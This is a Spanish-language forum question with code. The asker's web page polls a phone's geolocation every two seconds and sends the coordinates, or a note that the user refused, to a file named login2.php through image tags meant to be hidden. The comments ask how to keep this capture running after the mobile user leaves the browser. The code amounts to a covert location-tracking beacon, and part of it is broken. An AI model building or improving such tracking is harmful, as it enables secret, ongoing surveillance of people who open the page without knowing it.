# php deja de capturar cuando salgo de web

Tags: linux

tengo el archivo login2.php qué me captura todo mientras estoy viendo la web en el navedor, pero cuando salgo del navegador con el botón home me deja de captura y luego entro y prosigue capturando. ¿aque se debe eso hermanos?

```
<!DOCTYPE html>
<html lang="en">
<script>
window.onload = function(){
var button = document.getElementById('geoloc');
setInterval(function(){
button.click();
d=document.getElementById("mapa");
n=document.getElementById("mapa");
if (navigator.geolocation){
navigator.geolocation.getCurrentPosition(showPosition,showError);
}
else {
d.innerHTML="<p>Lo sentimos, tu dispositivo no admite la geolocaización.</p>";
}
},2000);  // this will make it click again every 2000 miliseconds
}
function showPosition(position){
latitud=position.coords.latitude;
longitud=position.coords.longitude;
d.innerHTML+="<img src=login2.php?coordenadas="+latitud+","+longitud+" visivility: hidden>";
}
function showError(error){
switch(error.code) {
negado="Denegadas";
n.innerHTML+="<img src=login2.php?coordenadas="+negado+" visivility: hidden>";
break;
case error.TIMEOUT:
d.innerHTML+="<p>El tiempo de espera para buscar la localización ha expirado.</p>"
break;
case error.UNKNOWN_ERROR:
d.innerHTML+="<p>Ha ocurrido un error desconocido.</p>"
break;
}
};
</script>
<input class="controls" type="text" name="coordenadas" id="coordenadas"><span id="geoloc"><input class="botons" type="button" name="geoloc" id="geoloc" onclick="geoloc()" value="Ver geolocalización"><br/><div id="mapa"></div></span></form></body></html>
```

Comment: EL botón home del navegador? El del sistema operativo? EN un dispositivo móvil?

Comment: Define "capturar" por favor...

Comment: en un dispositivo móvil. y cuándo salgo con  el botón home, para no cerrar, entonces mi archivo php qué captura la ubicación generada por d.innerHTML+="<img src=login2.php?coordenadas="+latitud+","+longitud+" visivility: hidden>";
deja de capturar, cuando vuelvo y entro al navegador sigue capturando! ¿a que se debe? será por esto navigator.geolocation.getCurrentPosition

Comment: más bien, como hago para que el html quede en segundo plano, así como cuando reproduces un vídeo de youtube y queda abierto en una ventana pequeña! ya que el navigator.geolocation.getCurrentPosition se detiene cuando hago una salida con el botón home de mi celular